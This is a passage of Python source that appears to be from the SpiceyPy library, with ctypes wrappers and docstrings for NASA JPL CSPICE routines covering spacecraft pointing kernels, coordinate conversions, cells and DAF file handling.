    Binary search for a key value within a double precision array assumed
    to be in increasing order. Return the index of the matching array
    entry, or -1 if the key value is not found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchd_c.html

    :param value: Value to find in array.
    :type value: float
    :param ndim: Dimension of array.
    :type ndim: int
    :param array: Array to be searched.
    :type array: Array of floats
    :return: index
    :rtype: int
    """
    return libspice.bsrchd_c(ctypes.c_double(value), ctypes.c_int(ndim),
                             stypes.toDoubleVector(array))
@spiceErrorCheck
def bsrchi(value, ndim, array):
    """
    Binary search for a key value within an integer array assumed to be
    in increasing order. Return the index of the matching array entry,
    or -1 if the key value is not found.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/bsrchi_c.html

    :param value: Value to find in array.
    :type value: int
    :param ndim: Dimension of array.
    :type ndim: int
    :param array: Array to be searched.
    :type array: Array of ints
    :return: index
    :rtype: int
    """
    return libspice.bsrchi_c(ctypes.c_int(value), ctypes.c_int(ndim),
                             stypes.toIntVector(array))
################################################################################
# C
@spiceErrorCheck
def card(cell):
    """
    Return the cardinality (the current number of elements) of a cell of
    any data type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/card_c.html

    :param cell: Input cell.
    :type cell: spiceypy.utils.support_types.SpiceCell
    :return: the number of elements in a cell of any data type.
    :rtype: int
    """
    # The cell structure is handed to CSPICE by reference.
    return libspice.card_c(ctypes.byref(cell))
@spiceErrorCheck
@spiceFoundExceptionThrower
def ccifrm(frclss, clssid, lenout=_default_len_out):
    """
    Return the frame name, frame ID, and center associated with a given
    frame class and class ID.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ccifrm_c.html

    :param frclss: Class of frame.
    :type frclss: int
    :param clssid: Class ID of frame.
    :type clssid: int
    :param lenout: Maximum length of output string.
    :type lenout: int
    :return:
            the frame name,
            frame ID,
            center.
    :rtype: tuple
    """
    lenout_c = ctypes.c_int(lenout)
    frname = stypes.stringToCharP(lenout_c)
    # Output scalars filled in by CSPICE.
    frcode = ctypes.c_int()
    center = ctypes.c_int()
    found = ctypes.c_int()
    libspice.ccifrm_c(ctypes.c_int(frclss), ctypes.c_int(clssid), lenout_c,
                      ctypes.byref(frcode), frname, ctypes.byref(center),
                      ctypes.byref(found))
    return (frcode.value, stypes.toPythonString(frname), center.value,
            bool(found.value))
@spiceErrorCheck
def cgv2el(center, vec1, vec2):
    """
    Form a SPICE ellipse from a center vector and two generating vectors.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cgv2el_c.html

    :param center: Center Vector
    :type center: 3-Element Array of floats
    :param vec1: Vector 1
    :type vec1: 3-Element Array of floats
    :param vec2: Vector 2
    :type vec2: 3-Element Array of floats
    :return: Ellipse
    :rtype: spiceypy.utils.support_types.Ellipse
    """
    ellipse = stypes.Ellipse()
    libspice.cgv2el_c(stypes.toDoubleVector(center),
                      stypes.toDoubleVector(vec1),
                      stypes.toDoubleVector(vec2), ctypes.byref(ellipse))
    return ellipse
@spiceErrorCheck
def chbder(cp, degp, x2s, x, nderiv):
    """
    Given the coefficients for the Chebyshev expansion of a polynomial,
    return the value of the polynomial and its first nderiv derivatives
    evaluated at the input X.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chbder_c.html

    :param cp: degp+1 Chebyshev polynomial coefficients.
    :type cp: Array of floats
    :param degp: Degree of polynomial.
    :type degp: int
    :param x2s: Transformation parameters of polynomial.
    :type x2s: Array of floats
    :param x: Value for which the polynomial is to be evaluated
    :type x: float
    :param nderiv: The number of derivatives to compute
    :type nderiv: int
    :return: Array of the derivatives of the polynomial
    :rtype: Array of floats
    """
    # Scratch space required by the CSPICE routine: 3*(nderiv+1) doubles.
    workspace = stypes.emptyDoubleVector(3 * (nderiv + 1))
    # Output: the polynomial value plus nderiv derivatives.
    dpdxs = stypes.emptyDoubleVector(nderiv + 1)
    libspice.chbder_c(stypes.toDoubleVector(cp), ctypes.c_int(degp),
                      stypes.toDoubleVector(x2s), ctypes.c_double(x),
                      ctypes.c_int(nderiv), workspace, dpdxs)
    return stypes.cVectorToPython(dpdxs)
@spiceErrorCheck
def chkin(module):
    """
    Inform the SPICE error handling mechanism of entry into a routine.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chkin_c.html

    :param module: The name of the calling routine.
    :type module: str
    """
    libspice.chkin_c(stypes.stringToCharP(module))
@spiceErrorCheck
def chkout(module):
    """
    Inform the SPICE error handling mechanism of exit from a routine.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/chkout_c.html

    :param module: The name of the calling routine.
    :type module: str
    """
    libspice.chkout_c(stypes.stringToCharP(module))
@spiceErrorCheck
@spiceFoundExceptionThrower
def cidfrm(cent, lenout=_default_len_out):
    """
    Retrieve frame ID code and name to associate with a frame center.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cidfrm_c.html

    :param cent: An object to associate a frame with.
    :type cent: int
    :param lenout: Available space in output string frname.
    :type lenout: int
    :return:
            frame ID code,
            name to associate with a frame center.
    :rtype: tuple
    """
    lenout_c = ctypes.c_int(lenout)
    frname = stypes.stringToCharP(lenout_c)
    frcode = ctypes.c_int()
    found = ctypes.c_int()
    libspice.cidfrm_c(ctypes.c_int(cent), lenout_c, ctypes.byref(frcode),
                      frname, ctypes.byref(found))
    return frcode.value, stypes.toPythonString(frname), bool(found.value)
@spiceErrorCheck
def ckcls(handle):
    """
    Close an open CK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckcls_c.html

    :param handle: Handle of the CK file to be closed.
    :type handle: int
    """
    libspice.ckcls_c(ctypes.c_int(handle))
@spiceErrorCheck
def ckcov(ck, idcode, needav, level, tol, timsys, cover=None):
    """
    Find the coverage window for a specified object in a specified CK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckcov_c.html

    :param ck: Name of CK file.
    :type ck: str
    :param idcode: ID code of object.
    :type idcode: int
    :param needav: Flag indicating whether angular velocity is needed.
    :type needav: bool
    :param level: Coverage level: (SEGMENT OR INTERVAL)
    :type level: str
    :param tol: Tolerance in ticks.
    :type tol: float
    :param timsys: Time system used to represent coverage.
    :type timsys: str
    :param cover: Window giving coverage for idcode.
    :type cover: Optional SpiceCell
    :return: coverage window for a specified object in a specified CK file
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Provide a default double-precision window if none was supplied,
    # then verify the caller's cell is of the right type.
    if not cover:
        cover = stypes.SPICEDOUBLE_CELL(20000)
    assert isinstance(cover, stypes.SpiceCell)
    assert cover.dtype == 1
    libspice.ckcov_c(stypes.stringToCharP(ck), ctypes.c_int(idcode),
                     ctypes.c_int(needav), stypes.stringToCharP(level),
                     ctypes.c_double(tol), stypes.stringToCharP(timsys),
                     ctypes.byref(cover))
    return cover
@spiceErrorCheck
@spiceFoundExceptionThrower
def ckgp(inst, sclkdp, tol, ref):
    """
    Get pointing (attitude) for a specified spacecraft clock time.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckgp_c.html

    :param inst: NAIF ID of instrument, spacecraft, or structure.
    :type inst: int
    :param sclkdp: Encoded spacecraft clock time.
    :type sclkdp: float
    :param tol: Time tolerance.
    :type tol: float
    :param ref: Reference frame.
    :type ref: str
    :return:
            C-matrix pointing data,
            Output encoded spacecraft clock time
    :rtype: tuple
    """
    cmat = stypes.emptyDoubleMatrix()
    clkout = ctypes.c_double()
    found = ctypes.c_int()
    libspice.ckgp_c(ctypes.c_int(inst), ctypes.c_double(sclkdp),
                    ctypes.c_double(tol), stypes.stringToCharP(ref), cmat,
                    ctypes.byref(clkout), ctypes.byref(found))
    return stypes.cMatrixToNumpy(cmat), clkout.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ckgpav(inst, sclkdp, tol, ref):
    """
    Get pointing (attitude) and angular velocity for a specified
    spacecraft clock time.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckgpav_c.html

    :param inst: NAIF ID of instrument, spacecraft, or structure.
    :type inst: int
    :param sclkdp: Encoded spacecraft clock time.
    :type sclkdp: float
    :param tol: Time tolerance.
    :type tol: float
    :param ref: Reference frame.
    :type ref: str
    :return:
            C-matrix pointing data,
            Angular velocity vector,
            Output encoded spacecraft clock time.
    :rtype: tuple
    """
    cmat = stypes.emptyDoubleMatrix()
    av = stypes.emptyDoubleVector(3)
    clkout = ctypes.c_double()
    found = ctypes.c_int()
    libspice.ckgpav_c(ctypes.c_int(inst), ctypes.c_double(sclkdp),
                      ctypes.c_double(tol), stypes.stringToCharP(ref), cmat,
                      av, ctypes.byref(clkout), ctypes.byref(found))
    return (stypes.cMatrixToNumpy(cmat), stypes.cVectorToPython(av),
            clkout.value, bool(found.value))
@spiceErrorCheck
def cklpf(filename):
    """
    Load a CK pointing file for use by the CK readers, returning that
    file's handle for use by other CK routines.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cklpf_c.html

    :param filename: Name of the CK file to be loaded.
    :type filename: str
    :return: Loaded file's handle.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.cklpf_c(stypes.stringToCharP(filename), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ckobj(ck, outCell=None):
    """
    Find the set of ID codes of all objects in a specified CK file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckobj_c.html

    :param ck: Name of CK file.
    :type ck: str
    :param outCell: Optional user provided Spice Int cell.
    :type outCell: Optional spiceypy.utils.support_types.SpiceCell
    :return: Set of ID codes of objects in CK file.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(ck, str)
    # Provide a default integer cell if the caller did not supply one,
    # then verify the cell type before handing it to CSPICE.
    if not outCell:
        outCell = stypes.SPICEINT_CELL(1000)
    assert isinstance(outCell, stypes.SpiceCell)
    assert outCell.dtype == 2
    libspice.ckobj_c(stypes.stringToCharP(ck), ctypes.byref(outCell))
    return outCell
@spiceErrorCheck
def ckopn(filename, ifname, ncomch):
    """
    Open a new CK file, returning the handle of the opened file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckopn_c.html

    :param filename: The name of the CK file to be opened.
    :type filename: str
    :param ifname: The internal filename for the CK.
    :type ifname: str
    :param ncomch: The number of characters to reserve for comments.
    :type ncomch: int
    :return: The handle of the opened CK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.ckopn_c(stypes.stringToCharP(filename),
                     stypes.stringToCharP(ifname), ctypes.c_int(ncomch),
                     ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ckupf(handle):
    """
    Unload a CK pointing file so that it will no longer be searched by
    the readers.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckupf_c.html

    :param handle: Handle of CK file to be unloaded
    :type handle: int
    """
    libspice.ckupf_c(ctypes.c_int(handle))
@spiceErrorCheck
def ckw01(handle, begtim, endtim, inst, ref, avflag, segid, nrec, sclkdp, quats,
          avvs):
    """
    Add a type 1 segment to a C-kernel.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw01_c.html

    :param handle: Handle of an open CK file.
    :type handle: int
    :param begtim: The beginning encoded SCLK of the segment.
    :type begtim: float
    :param endtim: The ending encoded SCLK of the segment.
    :type endtim: float
    :param inst: The NAIF instrument ID code.
    :type inst: int
    :param ref: The reference frame of the segment.
    :type ref: str
    :param avflag: True if the segment will contain angular velocity.
    :type avflag: bool
    :param segid: Segment identifier.
    :type segid: str
    :param nrec: Number of pointing records.
    :type nrec: int
    :param sclkdp: Encoded SCLK times.
    :type sclkdp: Array of floats
    :param quats: Quaternions representing instrument pointing.
    :type quats: Nx4-Element Array of floats
    :param avvs: Angular velocity vectors.
    :type avvs: Nx3-Element Array of floats
    """
    # All arguments are marshalled to ctypes inline; the CSPICE routine
    # performs the actual write.
    libspice.ckw01_c(ctypes.c_int(handle), ctypes.c_double(begtim),
                     ctypes.c_double(endtim), ctypes.c_int(inst),
                     stypes.stringToCharP(ref), ctypes.c_int(avflag),
                     stypes.stringToCharP(segid), ctypes.c_int(nrec),
                     stypes.toDoubleVector(sclkdp),
                     stypes.toDoubleMatrix(quats),
                     stypes.toDoubleMatrix(avvs))
@spiceErrorCheck
def ckw02(handle, begtim, endtim, inst, ref, segid, nrec, start, stop, quats,
          avvs, rates):
    """
    Write a type 2 segment to a C-kernel.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw02_c.html

    :param handle: Handle of an open CK file.
    :type handle: int
    :param begtim: The beginning encoded SCLK of the segment.
    :type begtim: float
    :param endtim: The ending encoded SCLK of the segment.
    :type endtim: float
    :param inst: The NAIF instrument ID code.
    :type inst: int
    :param ref: The reference frame of the segment.
    :type ref: str
    :param segid: Segment identifier.
    :type segid: str
    :param nrec: Number of pointing records.
    :type nrec: int
    :param start: Encoded SCLK interval start times.
    :type start: Array of floats
    :param stop: Encoded SCLK interval stop times.
    :type stop: Array of floats
    :param quats: Quaternions representing instrument pointing.
    :type quats: Nx4-Element Array of floats
    :param avvs: Angular velocity vectors.
    :type avvs: Nx3-Element Array of floats
    :param rates: Number of seconds per tick for each interval.
    :type rates: Array of floats
    """
    # All arguments are marshalled to ctypes inline; the CSPICE routine
    # performs the actual write.
    libspice.ckw02_c(ctypes.c_int(handle), ctypes.c_double(begtim),
                     ctypes.c_double(endtim), ctypes.c_int(inst),
                     stypes.stringToCharP(ref), stypes.stringToCharP(segid),
                     ctypes.c_int(nrec), stypes.toDoubleVector(start),
                     stypes.toDoubleVector(stop),
                     stypes.toDoubleMatrix(quats),
                     stypes.toDoubleMatrix(avvs),
                     stypes.toDoubleVector(rates))
@spiceErrorCheck
def ckw03(handle, begtim, endtim, inst, ref, avflag, segid, nrec, sclkdp, quats,
          avvs, nints, starts):
    """
    Add a type 3 segment to a C-kernel.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw03_c.html

    :param handle: Handle of an open CK file.
    :type handle: int
    :param begtim: The beginning encoded SCLK of the segment.
    :type begtim: float
    :param endtim: The ending encoded SCLK of the segment.
    :type endtim: float
    :param inst: The NAIF instrument ID code.
    :type inst: int
    :param ref: The reference frame of the segment.
    :type ref: str
    :param avflag: True if the segment will contain angular velocity.
    :type avflag: bool
    :param segid: Segment identifier.
    :type segid: str
    :param nrec: Number of pointing records.
    :type nrec: int
    :param sclkdp: Encoded SCLK times.
    :type sclkdp: Array of floats
    :param quats: Quaternions representing instrument pointing.
    :type quats: Nx4-Element Array of floats
    :param avvs: Angular velocity vectors.
    :type avvs: Nx3-Element Array of floats
    :param nints: Number of intervals.
    :type nints: int
    :param starts: Encoded SCLK interval start times.
    :type starts: Array of floats
    """
    # All arguments are marshalled to ctypes inline; the CSPICE routine
    # performs the actual write.
    libspice.ckw03_c(ctypes.c_int(handle), ctypes.c_double(begtim),
                     ctypes.c_double(endtim), ctypes.c_int(inst),
                     stypes.stringToCharP(ref), ctypes.c_int(avflag),
                     stypes.stringToCharP(segid), ctypes.c_int(nrec),
                     stypes.toDoubleVector(sclkdp),
                     stypes.toDoubleMatrix(quats),
                     stypes.toDoubleMatrix(avvs), ctypes.c_int(nints),
                     stypes.toDoubleVector(starts))
@spiceErrorCheck
def ckw05(handle, subtype, degree, begtim, endtim, inst, ref, avflag, segid,
          sclkdp, packts, rate, nints, starts):
    """
    Write a type 5 segment to a CK file.

    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ckw05_c.html

    :param handle: Handle of an open CK file.
    :type handle: int
    :param subtype: CK type 5 subtype code. Can be: 0, 1, 2, 3 see naif docs via link above.
    :type subtype: int
    :param degree: Degree of interpolating polynomials.
    :type degree: int
    :param begtim: The beginning encoded SCLK of the segment.
    :type begtim: float
    :param endtim: The ending encoded SCLK of the segment.
    :type endtim: float
    :param inst: The NAIF instrument ID code.
    :type inst: int
    :param ref: The reference frame of the segment.
    :type ref: str
    :param avflag: True if the segment will contain angular velocity.
    :type avflag: bool
    :param segid: Segment identifier.
    :type segid: str
    :param sclkdp: Encoded SCLK times.
    :type sclkdp: Array of floats
    :param packts: Array of packets.
    :type packts: Some NxM vector of floats
    :param rate: Nominal SCLK rate in seconds per tick.
    :type rate: float
    :param nints: Number of intervals.
    :type nints: int
    :param starts: Encoded SCLK interval start times.
    :type starts: Array of floats
    """
    # The packet count is derived from the packet array itself.
    n = ctypes.c_int(len(packts))
    libspice.ckw05_c(ctypes.c_int(handle), ctypes.c_int(subtype),
                     ctypes.c_int(degree), ctypes.c_double(begtim),
                     ctypes.c_double(endtim), ctypes.c_int(inst),
                     stypes.stringToCharP(ref), ctypes.c_int(avflag),
                     stypes.stringToCharP(segid), n,
                     stypes.toDoubleVector(sclkdp),
                     stypes.toDoubleMatrix(packts), ctypes.c_double(rate),
                     ctypes.c_int(nints), stypes.toDoubleVector(starts))
def cleard():
    """Stub for CSPICE's cleard; not implemented in this wrapper."""
    raise NotImplementedError
@spiceErrorCheck
def clight():
    """
    Return the speed of light in a vacuum (IAU official value, in km/sec).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/clight_c.html

    :return: The function returns the speed of light in vacuum (km/sec).
    :rtype: float
    """
    # Constant value supplied directly by CSPICE.
    return libspice.clight_c()
@spiceErrorCheck
def clpool():
    """
    Remove all variables from the kernel pool; watches on kernel
    variables are retained.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/clpool_c.html
    """
    # No arguments: the call clears the whole pool.
    libspice.clpool_c()
@spiceErrorCheck
def cltext(fname):
    """
    Internal undocumented command for closing a text file opened by RDTEXT.

    No URL available; relevant lines from SPICE source:

    FORTRAN SPICE, rdtext.f::

        C$Procedure CLTEXT ( Close a text file opened by RDTEXT)
              ENTRY CLTEXT ( FILE )
              CHARACTER*(*) FILE
        C     VARIABLE  I/O  DESCRIPTION
        C     --------  ---  --------------------------------------------------
        C     FILE       I   Text file to be closed.

    CSPICE, rdtext.c::

        /* $Procedure CLTEXT ( Close a text file opened by RDTEXT) */
        /* Subroutine */ int cltext_(char *file, ftnlen file_len)

    :param fname: Text file to be closed.
    :type fname: str
    """
    # The f2c-generated entry point also needs the Fortran string length.
    libspice.cltext_(stypes.stringToCharP(fname), ctypes.c_int(len(fname)))
@spiceErrorCheck
def cmprss(delim, n, instr, lenout=_default_len_out):
    """
    Compress a character string by removing occurrences of
    more than N consecutive occurrences of a specified
    character.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cmprss_c.html

    :param delim: Delimiter to be compressed.
    :type delim: str
    :param n: Maximum consecutive occurrences of delim.
    :type n: int
    :param instr: Input string.
    :type instr: str
    :param lenout: Optional available space in output string.
    :type lenout: Optional int
    :return: Compressed string.
    :rtype: str
    """
    delim = ctypes.c_char(delim.encode(encoding='UTF-8'))
    n = ctypes.c_int(n)
    instr = stypes.stringToCharP(instr)
    # Allocate the output buffer while lenout is still a plain int.
    output = stypes.stringToCharP(lenout)
    # Wrap lenout explicitly: previously it was passed as a bare Python int
    # and only worked through ctypes' implicit conversion; every sibling
    # wrapper converts scalar arguments explicitly.
    lenout = ctypes.c_int(lenout)
    libspice.cmprss_c(delim, n, instr, lenout, output)
    return stypes.toPythonString(output)
@spiceErrorCheck
@spiceFoundExceptionThrower
def cnmfrm(cname, lenout=_default_len_out):
    """
    Retrieve frame ID code and name to associate with an object.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cnmfrm_c.html

    :param cname: Name of the object to find a frame for.
    :type cname: int
    :param lenout: Maximum length available for frame name.
    :type lenout: int
    :return:
            The ID code of the frame associated with cname,
            The name of the frame with ID frcode.
    :rtype: tuple
    """
    lenout_c = ctypes.c_int(lenout)
    frname = stypes.stringToCharP(lenout_c)
    frcode = ctypes.c_int()
    found = ctypes.c_int()
    libspice.cnmfrm_c(stypes.stringToCharP(cname), lenout_c,
                      ctypes.byref(frcode), frname, ctypes.byref(found))
    return frcode.value, stypes.toPythonString(frname), bool(found.value)
@spiceErrorCheck
def conics(elts, et):
    """
    Determine the state (position, velocity) of an orbiting body from a
    set of elliptic, hyperbolic, or parabolic orbital elements.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/conics_c.html

    :param elts: Conic elements.
    :type elts: 8-Element Array of floats
    :param et: Input time.
    :type et: float
    :return: State of orbiting body at et.
    :rtype: 6-Element Array of floats
    """
    # Output buffer for the 6-component state vector.
    state = stypes.emptyDoubleVector(6)
    libspice.conics_c(stypes.toDoubleVector(elts), ctypes.c_double(et), state)
    return stypes.cVectorToPython(state)
@spiceErrorCheck
def convrt(x, inunit, outunit):
    """
    Take a measurement X, the units associated with X, and units to which
    X should be converted; return Y, the value of the measurement in the
    output units.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/convrt_c.html

    :param x: Number representing a measurement in some units.
    :type x: float
    :param inunit: The units in which x is measured.
    :type inunit: str
    :param outunit: Desired units for the measurement.
    :type outunit: str
    :return: The measurment in the desired units.
    :rtype: float
    """
    y = ctypes.c_double()
    libspice.convrt_c(ctypes.c_double(x), stypes.stringToCharP(inunit),
                      stypes.stringToCharP(outunit), ctypes.byref(y))
    return y.value
@spiceErrorCheck
def copy(cell):
    """
    Copy the contents of a SpiceCell of any data type to another
    cell of the same type.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/copy_c.html

    :param cell: Cell to be copied.
    :type cell: spiceypy.utils.support_types.SpiceCell
    :return: New cell
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(cell, stypes.SpiceCell)
    # Compare dtype with == rather than "is": identity comparison against
    # int literals only works via CPython's small-int caching and raises a
    # SyntaxWarning on Python >= 3.8.
    if cell.dtype == 0:
        newcopy = stypes.SPICECHAR_CELL(cell.size, cell.length)
    elif cell.dtype == 1:
        newcopy = stypes.SPICEDOUBLE_CELL(cell.size)
    elif cell.dtype == 2:
        newcopy = stypes.SPICEINT_CELL(cell.size)
    else:
        # Unknown cell data type.
        raise NotImplementedError
    libspice.copy_c(ctypes.byref(cell), ctypes.byref(newcopy))
    return newcopy
@spiceErrorCheck
def cpos(string, chars, start):
    """
    Find the first occurrence in a string of a character belonging to a
    collection of characters, starting at a specified location and
    searching forward.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cpos_c.html

    :param string: Any character string.
    :type string: str
    :param chars: A collection of characters.
    :type chars: str
    :param start: Position to begin looking for one of chars.
    :type start: int
    :return:
            The index of the first character of str at or
            following index start that is in the collection chars.
    :rtype: int
    """
    return libspice.cpos_c(stypes.stringToCharP(string),
                           stypes.stringToCharP(chars), ctypes.c_int(start))
@spiceErrorCheck
def cposr(string, chars, start):
    """
    Find the first occurrence in a string of a character belonging to a
    collection of characters, starting at a specified location and
    searching in reverse.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cposr_c.html

    :param string: Any character string.
    :type string: str
    :param chars: A collection of characters.
    :type chars: str
    :param start: Position to begin looking for one of chars.
    :type start: int
    :return:
            The index of the last character of str at or
            before index start that is in the collection chars.
    :rtype: int
    """
    return libspice.cposr_c(stypes.stringToCharP(string),
                            stypes.stringToCharP(chars), ctypes.c_int(start))
@spiceErrorCheck
def cvpool(agent):
    """
    Indicate whether or not any watched kernel variables that have a
    specified agent on their notification list have been updated.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cvpool_c.html

    :param agent: Name of the agent to check for notices.
    :type agent: str
    :return: True if variables for "agent" have been updated.
    :rtype: bool
    """
    update = ctypes.c_int()
    libspice.cvpool_c(stypes.stringToCharP(agent), ctypes.byref(update))
    return bool(update.value)
@spiceErrorCheck
def cyllat(r, lonc, z):
    """
    Convert from cylindrical to latitudinal coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cyllat_c.html

    :param r: Distance of point from z axis.
    :type r: float
    :param lonc: Cylindrical angle of point from XZ plane(radians).
    :type lonc: float
    :param z: Height of point above XY plane.
    :type z: float
    :return: Distance, Longitude (radians), and Latitude of point (radians).
    :rtype: tuple
    """
    # Output scalars filled in by CSPICE.
    radius = ctypes.c_double()
    lon = ctypes.c_double()
    lat = ctypes.c_double()
    libspice.cyllat_c(ctypes.c_double(r), ctypes.c_double(lonc),
                      ctypes.c_double(z), ctypes.byref(radius),
                      ctypes.byref(lon), ctypes.byref(lat))
    return radius.value, lon.value, lat.value
@spiceErrorCheck
def cylrec(r, lon, z):
    """
    Convert from cylindrical to rectangular coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cylrec_c.html

    :param r: Distance of a point from z axis.
    :type r: float
    :param lon: Angle (radians) of a point from xZ plane.
    :type lon: float
    :param z: Height of a point above xY plane.
    :type z: float
    :return: Rectangular coordinates of the point.
    :rtype: 3-Element Array of floats
    """
    # Output buffer for the rectangular coordinates.
    rectan = stypes.emptyDoubleVector(3)
    libspice.cylrec_c(ctypes.c_double(r), ctypes.c_double(lon),
                      ctypes.c_double(z), rectan)
    return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def cylsph(r, lonc, z):
    """
    Convert from cylindrical to spherical coordinates.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/cylsph_c.html

    :param r: Rectangular coordinates of the point.
    :type r: float
    :param lonc: Angle (radians) of point from XZ plane.
    :type lonc: float
    :param z: Height of point above XY plane.
    :type z: float
    :return:
            Distance of point from origin,
            Polar angle (co-latitude in radians) of point,
            Azimuthal angle (longitude) of point (radians).
    :rtype: tuple
    """
    r = ctypes.c_double(r)
    lonc = ctypes.c_double(lonc)
    z = ctypes.c_double(z)
    radius = ctypes.c_double()
    colat = ctypes.c_double()
    lon = ctypes.c_double()
    # BUGFIX: previously this called cyllat_c (cylindrical -> latitudinal),
    # which returns (radius, lon, lat) and therefore filled colat/lon with
    # the wrong quantities. cylsph_c returns (radius, colat, lon).
    libspice.cylsph_c(r, lonc, z, ctypes.byref(radius), ctypes.byref(colat),
                      ctypes.byref(lon))
    return radius.value, colat.value, lon.value
################################################################################
# D
@spiceErrorCheck
def dafac(handle, buffer):
    """
    Add comments from a buffer of character strings to the comment area
    of a binary DAF file, appending them to any comments which are
    already present in the file's comment area.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafac_c.html

    :param handle: handle of a DAF opened with write access.
    :type handle: int
    :param buffer: Buffer of comments to put into the comment area.
    :type buffer: list[str]
    """
    n = ctypes.c_int(len(buffer))
    # Row length of the C string array: longest comment plus a NUL byte.
    lenvals = ctypes.c_int(max(len(s) for s in buffer) + 1)
    buffer_p = stypes.listToCharArrayPtr(buffer)
    libspice.dafac_c(ctypes.c_int(handle), n, lenvals, buffer_p)
@spiceErrorCheck
def dafbbs(handle):
    """
    Begin a backward search for arrays in a DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafbbs_c.html

    :param handle: Handle of DAF to be searched.
    :type handle: int
    """
    libspice.dafbbs_c(ctypes.c_int(handle))
@spiceErrorCheck
def dafbfs(handle):
    """
    Begin a forward search for arrays in a DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafbfs_c.html

    :param handle: Handle of file to be searched.
    :type handle: int
    """
    libspice.dafbfs_c(ctypes.c_int(handle))
@spiceErrorCheck
def dafcls(handle):
    """
    Close the DAF associated with a given handle.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafcls_c.html

    :param handle: Handle of DAF to be closed.
    :type handle: int
    """
    libspice.dafcls_c(ctypes.c_int(handle))
@spiceErrorCheck
def dafcs(handle):
    """
    Select a DAF that already has a search in progress as the one
    to continue searching.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafcs_c.html

    :param handle: Handle of DAF to continue searching.
    :type handle: int
    """
    libspice.dafcs_c(ctypes.c_int(handle))
@spiceErrorCheck
def dafdc(handle):
    """
    Delete the entire comment area of a specified DAF file.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafdc_c.html

    :param handle: The handle of a binary DAF opened for writing.
    :type handle: int
    """
    libspice.dafdc_c(ctypes.c_int(handle))
@spiceErrorCheck
def dafec(handle, bufsiz, lenout=_default_len_out):
    """
    Extract comments from the comment area of a binary DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/dafec_c.html

    :param handle: Handle of binary DAF opened with read access.
    :type handle: int
    :param bufsiz: Maximum size, in lines, of buffer.
    :type bufsiz: int
    :param lenout: Length of strings in output buffer.
    :type lenout: int
    :return:
            Number of extracted comment lines,
            buffer where extracted comment lines are placed,
            Indicates whether all comments have been extracted.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    # Allocate the bufsiz-by-lenout character buffer while both sizes are
    # still plain Python ints; they are rebound to c_int just below.
    buffer = stypes.emptyCharArray(yLen=bufsiz, xLen=lenout)
    bufsiz = ctypes.c_int(bufsiz)
    lenout = ctypes.c_int(lenout)
    n = ctypes.c_int()
    done = ctypes.c_int()
    libspice.dafec_c(handle, bufsiz, lenout, ctypes.byref(n),
                     ctypes.byref(buffer), ctypes.byref(done))
    # done is a SPICE boolean (int) flag; expose it as a Python bool.
    return n.value, stypes.cVectorToPython(buffer), bool(done.value)
@spiceErrorCheck
def daffna():
    """
    Find the next (forward) array in the current DAF.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/daffna_c.html

    :return: True if an array was found.
    :rtype: bool
    """
    foundflag = ctypes.c_int()
